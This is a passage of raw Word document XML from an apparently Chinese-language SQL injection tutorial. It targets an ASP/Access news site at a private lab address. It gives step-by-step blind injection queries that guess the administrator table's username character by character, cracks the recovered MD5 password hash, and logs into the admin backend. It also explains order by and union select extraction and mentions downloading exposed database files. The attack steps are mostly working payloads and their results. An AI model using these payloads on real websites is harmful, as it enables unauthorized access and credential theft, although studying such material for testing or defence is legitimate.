    <w:p w14:paraId="61E6D330" w14:textId="77777777" w:rsidR="00821B90" w:rsidRPr="00764DAB" w:rsidRDefault="009555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1,1)) from administrator)&gt;</w:t>
      </w:r>
      <w:r w:rsidR="002D191A" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
      <w:r w:rsidR="00821B90" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   //</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回正常页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F40D557" w14:textId="77777777" w:rsidR="007E4353" w:rsidRPr="00764DAB" w:rsidRDefault="002D191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字段对应的ASCll值在90和100之间。继续提交。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254562F1" w14:textId="77777777" w:rsidR="00821B90" w:rsidRPr="00764DAB" w:rsidRDefault="009555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 xml:space="preserve">http://192.168.1.55:901/news_view.asp?id=14 and (select top 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>asc(mid(user_name,1,1)) from administrator)&gt;</w:t>
      </w:r>
      <w:r w:rsidR="002D191A" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>96</w:t>
      </w:r>
      <w:r w:rsidR="00821B90" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  //</w:t>
      </w:r>
      <w:r w:rsidR="002D191A" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回正常页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F18699" w14:textId="77777777" w:rsidR="00821B90" w:rsidRPr="00764DAB" w:rsidRDefault="002D191A" w:rsidP="003D5726">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字段对应的ASCll值在96和100之间。继续提交。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C58D9F" w14:textId="77777777" w:rsidR="00821B90" w:rsidRPr="00764DAB" w:rsidRDefault="002D191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1,1)) from administrator)&gt;97</w:t>
      </w:r>
      <w:r w:rsidR="00821B90" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  //</w:t>
      </w:r>
      <w:r w:rsidR="0095552D" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回错误页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD6F84A" w14:textId="77777777" w:rsidR="0095552D" w:rsidRPr="00764DAB" w:rsidRDefault="00962AB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说明administrator表中的user_name字段的第一位ASCII值为</w:t>
      </w:r>
      <w:r w:rsidR="00821B90" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>97</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。通过反查ASCII值对应的字母，得到字符值为“a”</w:t>
      </w:r>
      <w:r w:rsidR="00522320" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（图11）</w:t>
      </w:r>
      <w:r w:rsidR="006C28E9" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>接着第二位查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FFD518" w14:textId="77777777" w:rsidR="0095552D" w:rsidRPr="0095552D" w:rsidRDefault="006C28E9" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C73DAC4" wp14:editId="539C5BC2">
            <wp:extent cx="5014125" cy="365740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019584" cy="3661388"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="389EEBFC" w14:textId="77777777" w:rsidR="0095552D" w:rsidRPr="006C790B" w:rsidRDefault="006C28E9" w:rsidP="003D5726">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASCll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值得到字母</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CFFC89" w14:textId="77777777" w:rsidR="006C28E9" w:rsidRPr="00764DAB" w:rsidRDefault="006C28E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2,1)) from administrator)&gt;99  //返回正常页面(注：查第二个字母的时候</w:t>
      </w:r>
      <w:r w:rsidR="00EC735E" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>记得把user_name后面的1变成2</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D17F361" w14:textId="77777777" w:rsidR="006C28E9" w:rsidRPr="00764DAB" w:rsidRDefault="006C28E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and (select top 1 asc(mid(user_name,2,1)) from administrator)&gt;100  //返回错误页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE0A163" w14:textId="77777777" w:rsidR="00A33737" w:rsidRDefault="006C28E9" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3078F10D" wp14:editId="2AC455D1">
            <wp:extent cx="4752975" cy="1809750"/>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769639" cy="1816095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="569C21F0" w14:textId="77777777" w:rsidR="00A33737" w:rsidRDefault="00A33737" w:rsidP="00B825AF">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECEDF43" w14:textId="77777777" w:rsidR="003E0CA4" w:rsidRPr="006C28E9" w:rsidRDefault="006C28E9" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="491D0173" wp14:editId="78CD8066">
            <wp:extent cx="4867275" cy="1666875"/>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84529" cy="1672784"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2157D679" w14:textId="77777777" w:rsidR="00BE507C" w:rsidRPr="000449C6" w:rsidRDefault="00EC735E" w:rsidP="00B825AF">
      <w:pPr>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASCll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值得到第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字母为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CB9E39" w14:textId="77777777" w:rsidR="00EC735E" w:rsidRPr="00764DAB" w:rsidRDefault="00EC735E" w:rsidP="00074D5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 xml:space="preserve"> 用同样的方法，可猜解user_name字段值和password值,最终得到如下结果</w:t>
      </w:r>
      <w:r w:rsidR="001C144C" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B81C860" w14:textId="77777777" w:rsidR="00EC735E" w:rsidRPr="00764DAB" w:rsidRDefault="00144EAF" w:rsidP="00A33737">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:left="420"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w:t>
      </w:r>
      <w:r w:rsidR="00EC735E" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>user_name]:admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF0D247" w14:textId="77777777" w:rsidR="00144EAF" w:rsidRPr="00764DAB" w:rsidRDefault="00EC735E" w:rsidP="00A33737">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:left="420"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password]:21232f297a57a5a743894a0e4a801fc3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBFF1F8" w14:textId="77777777" w:rsidR="00BE507C" w:rsidRPr="00764DAB" w:rsidRDefault="00144EAF"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看出password的值为32位MD5加密，使用MD5在线破解工具进行破解，得到明文密码为admin(图14).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B27A75" w14:textId="77777777" w:rsidR="00144EAF" w:rsidRDefault="00144EAF" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EC3D145" wp14:editId="39404CF6">
            <wp:extent cx="5274310" cy="327503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274310" cy="3275032"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6510994B" w14:textId="77777777" w:rsidR="00BE507C" w:rsidRDefault="00144EAF" w:rsidP="003D5726">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">14  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>破解出密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D5B454" w14:textId="77777777" w:rsidR="00BE507C" w:rsidRDefault="00B825AF" w:rsidP="00B825AF">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>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得到管理员用户名和密码后，登录后台</w:t>
      </w:r>
      <w:r w:rsidR="00144EAF" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:http://192.168.1.55:901/admin/index.asp，输入猜解出来的用户名和密码.就可以成功进入网站后台页面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4973CB70" w14:textId="77777777" w:rsidR="002E4754" w:rsidRPr="002E4754" w:rsidRDefault="002E4754" w:rsidP="002E4754">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E4754">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小提示:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E4754">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E4754">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r w:rsidRPr="002E4754">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据库都是存放在网站目录下，后缀格式为mdb，asp，asa,可以通过一些暴库手段、目录猜解等直接下载数据库，如果是MSSQL、MYSQL等，一般数据库是存储在数据库安装路径下，后缀格式为myi，myd，frm，mdf 不能通过下载得到库。除非走狗屎运，对方管理员把网站库备份在网站目录下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A50681E" w14:textId="77777777" w:rsidR="002E4754" w:rsidRPr="002E4754" w:rsidRDefault="002E4754" w:rsidP="002E4754">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B73E55" w14:textId="77777777" w:rsidR="002E4754" w:rsidRPr="002E4754" w:rsidRDefault="002E4754" w:rsidP="002E4754">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E4754">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>php+mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DF3167" w14:textId="77777777" w:rsidR="002E4754" w:rsidRPr="002E4754" w:rsidRDefault="002E4754" w:rsidP="002E4754">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E4754">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据库存储在数据库安装路径下，后缀格式myi，myd，frm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E76ECE5" w14:textId="77777777" w:rsidR="00611EEE" w:rsidRPr="00F838F6" w:rsidRDefault="00611EEE" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F838F6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>SQL注入中的高级查询——order by 与union select</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136AFB0A" w14:textId="77777777" w:rsidR="00611EEE" w:rsidRPr="00764DAB" w:rsidRDefault="00611EEE"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上一节中介绍的ASCII码猜解法很浪费时间，下面介绍一种高效率的方法一一order by与union select联合查询,可以快速地获得字段长度及字段内容。这种查询方法，不仅可以利用在Access数据库猜解中，必须掌握的方法。同样也可以利用在其他类型数据库的注入猜解中，是一种非常重要，而且必须掌</w:t>
      </w:r>
      <w:r w:rsidR="005677F2" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>握</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2D6D0D" w14:textId="77777777" w:rsidR="00611EEE" w:rsidRPr="00E6723A"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lastRenderedPageBreak/>
        <w:t>1.6.1</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00611EEE" w:rsidRPr="00E6723A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>order by猜字段数目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBD4AF7" w14:textId="77777777" w:rsidR="00611EEE" w:rsidRPr="00764DAB" w:rsidRDefault="00611EE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利用order by猜解字段数目，查询语句如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F1A4E4"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rder by 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4FC3C1"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rder by 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B157F94"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CC4102"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rder by n-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E6C776"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rder by n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107EDCA0" w14:textId="77777777" w:rsidR="00611EEE" w:rsidRPr="00764DAB" w:rsidRDefault="00611EE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n-1时返回正常，n时返回错误，那么说明字段数目为n。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE2A909" w14:textId="77777777" w:rsidR="00611EEE" w:rsidRPr="00E6723A"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6.2</w:t>
      </w:r>
      <w:r w:rsidR="0045150E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00611EEE" w:rsidRPr="00E6723A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>union select爆字段内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7B9FFA" w14:textId="77777777" w:rsidR="00611EEE" w:rsidRPr="00764DAB" w:rsidRDefault="00611EE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得到字段长度后，就可利用union select查询获得字段内容了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B50E44"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1=2 union select1, 2, 3...., n from 表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF11560" w14:textId="77777777" w:rsidR="00611EEE" w:rsidRPr="00764DAB" w:rsidRDefault="00611EE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执行上面的查询时，在页面中会返回数字，修改查询语句中的数字为字段名，例如提交如下代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CDF970" w14:textId="77777777" w:rsidR="00611EEE" w:rsidRPr="00BF1BD2" w:rsidRDefault="00611EE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1=2 union select1, 字段1, 字段2...., n from 表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E71760" w14:textId="77777777" w:rsidR="003B1F97" w:rsidRPr="00764DAB" w:rsidRDefault="003B1F9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页面中就会返回字段内容，不必一个一个进行猜解了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1378A7FA" w14:textId="77777777" w:rsidR="00346D29" w:rsidRPr="00E6723A"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6.3</w:t>
      </w:r>
      <w:r w:rsidR="0045150E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00346D29" w:rsidRPr="00E6723A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>union select查询攻击测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D0DD17" w14:textId="77777777" w:rsidR="00346D29" w:rsidRPr="00764DAB" w:rsidRDefault="00346D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前面的案例中.己猜解出了表名及字段名，现在来进行高效查询获得字段内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BE88D4" w14:textId="77777777" w:rsidR="00346D29" w:rsidRPr="00764DAB" w:rsidRDefault="00346D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查询字段数目，提交如下</w:t>
      </w:r>
      <w:r w:rsidR="00D77FA7" w:rsidRPr="00764DAB">
        <w:rPr>
